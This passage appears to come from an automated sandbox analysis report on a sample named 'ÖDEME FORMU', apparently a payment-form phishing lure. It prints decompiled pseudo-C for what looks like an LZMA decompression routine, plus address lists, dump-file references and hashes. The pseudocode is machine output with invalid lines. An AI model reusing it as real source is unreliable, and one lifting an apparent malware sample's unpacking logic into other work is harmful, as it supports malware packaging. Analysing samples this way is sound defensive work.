													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406322
0x00406322
0x00406326
0x00406347
0x0040634e
0x00406354
0x0040635a
0x0040636c
0x00406372
0x00406377
0x00000000
0x00406328
0x0040632e
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00000000
0x00000000
0x00406740
0x00406744
0x004068f3
0x00406909
0x00406911
0x00406918
0x0040691a
0x00406921
0x00406925
0x00406925
0x00406750
0x00406757
0x0040675f
0x00406762
0x00406765
0x00406765
0x0040676b
0x0040676b
0x00405f07
0x00405f07
0x00405f07
0x00405f10
0x00000000
0x00000000
0x00405f16
0x00000000
0x00405f21
0x00000000
0x00000000
0x00405f2a
0x00405f2d
0x00405f30
0x00405f34
0x00000000
0x00000000
0x00405f3a
0x00405f3d
0x00405f3f
0x00405f40
0x00405f43
0x00405f45
0x00405f46
0x00405f48
0x00405f4b
0x00405f50
0x00405f55
0x00405f5e
0x00405f71
0x00405f74
0x00405f80
0x00405fa8
0x00405faa
0x00405fb8
0x00405fb8
0x00405fbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fac
0x00405fac
0x00405faf
0x00405fb0
0x00405fb0
0x00000000
0x00405fac
0x00405f86
0x00405f8b
0x00405f8b
0x00405f94
0x00405f9c
0x00405f9f
0x00000000
0x00405fa5
0x00405fa5
0x00000000
0x00405fa5
0x00000000
0x00405fc2
0x00405fc2
0x00405fc6
0x00406872
0x00000000
0x00406872
0x00405fcf
0x00405fdf
0x00405fe2
0x00405fe5
0x00405fe5
0x00405fe5
0x00405fe8
0x00405fec
0x00000000
0x00000000
0x00405fee
0x00405ff4
0x0040601e
0x00406024
0x0040602b
0x00000000
0x0040602b
0x00405ffa
0x00405ffd
0x00406002
0x00406002
0x0040600d
0x00406015
0x00406018
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605d
0x00406063
0x00406066
0x00406073
0x0040607b
0x00000000
0x00000000
0x00406032
0x00406032
0x00406036
0x00406881
0x00000000
0x00406881
0x00406042
0x0040604d
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406056
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406083
0x00406085
0x00406088
0x004060f9
0x004060fc
0x004060ff
0x00406106
0x00406110
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x0040608a
0x0040608e
0x00406091
0x00406093
0x00406096
0x00406099
0x0040609b
0x0040609e
0x004060a0
0x004060a5
0x004060a8
0x004060ab
0x004060af
0x004060b6
0x004060b9
0x004060c0
0x004060c4
0x004060cc
0x004060cc
0x004060cc
0x004060c6
0x004060c6
0x004060c6
0x004060bb
0x004060bb
0x004060bb
0x004060d0
0x004060d3
0x004060f1
0x004060f3
0x00000000
0x004060d5
0x004060d5
0x004060d8
0x004060db
0x004060de
0x004060e0
0x004060e0
0x004060e0
0x004060e3
0x004060e6
0x004060e8
0x004060e9
0x004060ec
0x00000000
0x004060ec
0x00000000
0x00000000
0x00000000
0x0040638c
0x00406390
0x004063b3
0x004063b6
0x004063b9
0x004063c3
0x00406392
0x00406392
0x00406395
0x00406398
0x0040639b
0x004063a8
0x004063ab
0x004063ab
0x004066ef
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x00000000
0x004063cf
0x004063d3
0x00000000
0x00000000
0x004063d9
0x004063dd
0x00000000
0x00000000
0x004063e3
0x004063e5
0x004063e9
0x004063e9
0x004063ec
0x004063f0
0x00000000
0x00000000
0x00406440
0x00406444
0x0040644b
0x0040644e
0x00406451
0x0040645b
0x004066ef
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066ef
0x00406446
0x00000000
0x00000000
0x00406467
0x0040646b
0x00406472
0x00406475
0x00406478
0x0040646d
0x0040646d
0x0040646d
0x0040647b
0x0040647e
0x00406481
0x00406481
0x00406484
0x00406487
0x0040648a
0x0040648a
0x0040648d
0x00406494
0x00406499
0x00000000
0x00000000
0x00406527
0x00406527
0x0040652b
0x004068c9
0x00000000
0x004068c9
0x00406531
0x00406534
0x00406537
0x0040653b
0x0040653e
0x00406544
0x00406546
0x00406546
0x00406546
0x00406549
0x0040654c
0x00000000
0x00000000
0x0040611c
0x0040611c
0x00406120
0x0040688d
0x00000000
0x0040688d
0x00406126
0x00406129
0x0040612c
0x00406130
0x00406133
0x00406139
0x0040613b
0x0040613b
0x0040613b
0x0040613e
0x00406141
0x00406141
0x00406144
0x00406147
0x00000000
0x00000000
0x0040614d
0x00406153
0x00000000
0x00000000
0x00406159
0x00406159
0x0040615d
0x00406160
0x00406163
0x00406166
0x00406169
0x0040616a
0x0040616d
0x0040616f
0x00406175
0x00406178
0x0040617b
0x0040617e
0x00406181
0x00406184
0x00406187
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061b3
0x004061b7
0x004061b9
0x004061bd
0x00406189
0x00406189
0x0040618d
0x00406195
0x0040619a
0x0040619c
0x0040619e
0x0040619e
0x004061c0
0x004061c7
0x004061ca
0x00000000
0x004061d0
0x00000000
0x004061d0
0x00000000
0x004061d5
0x004061d5
0x004061d9
0x00406899
0x00000000
0x00406899
0x004061df
0x004061e2
0x004061e5
0x004061e9
0x004061ec
0x004061f2
0x004061f4
0x004061f4
0x004061f4
0x004061f7
0x004061fa
0x004061fa
0x004061fa
0x00406200
0x00000000
0x00000000
0x00406202
0x00406205
0x00406208
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x0040621a
0x0040621d
0x00406220
0x00406238
0x0040623b
0x0040623e
0x00406241
0x00406241
0x00406244
0x00406248
0x0040624a
0x00406222
0x00406222
0x0040622a
0x0040622f
0x00406231
0x00406233
0x00406233
0x0040624d
0x00406254
0x00406257
0x00000000
0x00406259
0x00000000
0x00406259
0x00406257
0x0040625e
0x0040625e
0x0040625e
0x0040625e
0x00000000
0x00000000
0x00406299
0x00406299
0x0040629d
0x004068a5
0x00000000
0x004068a5
0x004062a3
0x004062a6
0x004062a9
0x004062ad
0x004062b0
0x004062b6
0x004062b8
0x004062b8
0x004062b8
0x004062bb
0x004062be
0x004062be
0x004062c4
0x00406262
0x00406262
0x00406265
0x00000000
0x00406265
0x004062c6
0x004062c6
0x004062c9
0x004062cc
0x004062cf
0x004062d2
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e1
0x004062e4
0x004062fc
0x004062ff
0x00406302
0x00406305
0x00406305
0x00406308
0x0040630c
0x0040630e
0x004062e6
0x004062e6
0x004062ee
0x004062f3
0x004062f5
0x004062f7
0x004062f7
0x00406311
0x00406318
0x0040631b
0x00000000
0x0040631d
0x00000000
0x0040631d
0x00000000
0x004065aa
0x004065aa
0x004065ae
0x004068d5
0x00000000
0x004068d5
0x004065b4
0x004065b7
0x004065ba
0x004065be
0x004065c1
0x004065c7
0x004065c9
0x004065c9
0x004065c9
0x004065cc
0x00000000
0x00000000
0x0040637a
0x0040637a
0x0040637d
0x004066ef
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x00000000
0x004066b9
0x004066bd
0x004066df
0x004066e2
0x004066ec
0x004066ef
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066ef
0x004066bf
0x004066c2
0x004066c6
0x004066c9
0x004066c9
0x004066cc
0x00000000
0x00000000
0x00406776
0x0040677a
0x00406798
0x00406798
0x00406798
0x0040679f
0x004067a6
0x004067ad
0x004067ad
0x00000000
0x004067ad
0x0040677c
0x0040677f
0x00406782
0x00406785
0x0040678c
0x004066d0
0x004066d0
0x004066d3
0x00000000
0x00000000
0x00406867
0x0040686a
0x0040676b
0x00000000
0x00000000
0x004064a1
0x004064a3
0x004064aa
0x004064ab
0x004064ad
0x004064b0
0x00000000
0x00000000
0x004064b8
0x004064bb
0x004064be
0x004064c0
0x004064c2
0x004064c2
0x004064c3
0x004064c6
0x004064cd
0x004064d0
0x004064de
0x00000000
0x00000000
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x00000000
0x00000000
0x004067c3
0x004067c3
0x004067c7
0x004068ff
0x00000000
0x004068ff
0x004067cd
0x004067d0
0x004067d3
0x004067d7
0x004067da
0x004067e0
0x004067e2
0x004067e2
0x004067e2
0x004067e5
0x004067e8
0x004067e8
0x004067e8
0x004067e8
0x004067eb
0x004067eb
0x004067ef
0x0040684f
0x00406852
0x00406857
0x00406858
0x0040685a
0x0040685c
0x0040685f
0x0040676b
0x0040676b
0x00000000
0x00406771
0x0040676b
0x004067f1
0x004067f7
0x004067fa
0x004067fd
0x00406800
0x00406803
0x00406806
0x00406809
0x0040680c
0x0040680f
0x00406812
0x0040682b
0x0040682e
0x00406831
0x00406834
0x00406838
0x0040683a
0x0040683a
0x0040683b
0x0040683e
0x00406814
0x00406814
0x0040681c
0x00406821
0x00406823
0x00406826
0x00406826
0x00406841
0x00406848
0x00000000
0x0040684a
0x00000000
0x0040684a
0x00000000
0x004064e6
0x004064e9
0x0040651f
0x0040664f
0x0040664f
0x0040664f
0x0040664f
0x00406652
0x00406652
0x00406655
0x00406657
0x004068e1
0x00000000
0x004068e1
0x0040665d
0x00406660
0x00000000
0x00000000
0x00406666
0x0040666a
0x0040666d
0x0040666d
0x0040666d
0x00000000
0x0040666d
0x004064eb
0x004064ed
0x004064ef
0x004064f1
0x004064f4
0x004064f5
0x004064f7
0x004064f9
0x004064fc
0x004064ff
0x00406515
0x0040651a
0x00406552
0x00406552
0x00406556
0x00406582
0x00406584
0x0040658b
0x0040658e
0x00406591
0x00406591
0x00406596
0x00406596
0x00406598
0x0040659b
0x004065a2
0x004065a5
0x004065d2
0x004065d2
0x004065d5
0x004065d8
0x0040664c
0x0040664c
0x0040664c
0x00000000
0x0040664c
0x004065da
0x004065e0
0x004065e3
0x004065e6
0x004065e9
0x004065ec
0x004065ef
0x004065f2
0x004065f5
0x004065f8
0x004065fb
0x00406614
0x00406616
0x00406619
0x0040661a
0x0040661d
0x0040661f
0x00406622
0x00406624
0x00406626
0x00406629
0x0040662b
0x0040662e
0x00406632
0x00406634
0x00406634
0x00406635
0x00406638
0x0040663b
0x004065fd
0x004065fd
0x00406605
0x0040660a
0x0040660c
0x0040660f
0x0040660f
0x0040663e
0x00406645
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x00000000
0x00406647
0x00000000
0x00406647
0x00406645
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406571
0x00406571
0x00406574
0x0040657b
0x0040654f
0x0040654f
0x0040654f
0x0040654f
0x00000000
0x0040657d
0x00000000
0x0040657d
0x0040657b
0x00406501
0x00406504
0x00406506
0x00406509
0x00000000
0x00000000
0x00406268
0x00406268
0x0040626c
0x004068b1
0x00000000
0x004068b1
0x00406272
0x00406275
0x00406278
0x0040627b
0x0040627e
0x00406281
0x00406284
0x00406286
0x00406289
0x0040628c
0x0040628f
0x00406291
0x00406291
0x00406291
0x00000000
0x00000000
0x004063f3
0x004063f3
0x004063f7
0x004068bd
0x00000000
0x004068bd
0x004063fd
0x00406400
0x00406403
0x00406406
0x00406408
0x00406408
0x00406408
0x0040640b
0x0040640e
0x00406411
0x00406414
0x00406417
0x0040641a
0x0040641b
0x0040641d
0x0040641d
0x0040641d
0x00406420
0x00406423
0x00406426
0x00406429
0x00406429
0x00406429
0x0040642c
0x0040642e
0x0040642e
0x00000000
0x00000000
0x00406670
0x00406670
0x00406670
0x00406674
0x00000000
0x00000000
0x0040667a
0x0040667d
0x00406680
0x00406683
0x00406685
0x00406685
0x00406685
0x00406688
0x0040668b
0x0040668e
0x00406691
0x00406694
0x00406697
0x00406698
0x0040669a
0x0040669a
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066ad
0x004066af
0x004066b2
0x00000000
0x004066b4
0x00406431
0x00406431
0x00000000
0x00406431
0x004066b2
0x004068e7
0x00000000
0x00000000
0x00405f16
0x0040691e
0x0040691e
0x00000000
0x0040691e
0x0040676b
0x004066f2
0x004066ef
0x00000000
0x00406326

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
Instruction ID: ded64b1a4db59f6dff1a94f5a9d162ff15a4dde6347ba0f82720ffa54b61a1b0
Opcode Fuzzy Hash: 23d90c1db76db7edd9cc4d8a45db571517f104fb6d742d4438539565e12cc062
Instruction Fuzzy Hash: 09711371D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406440 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406440() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
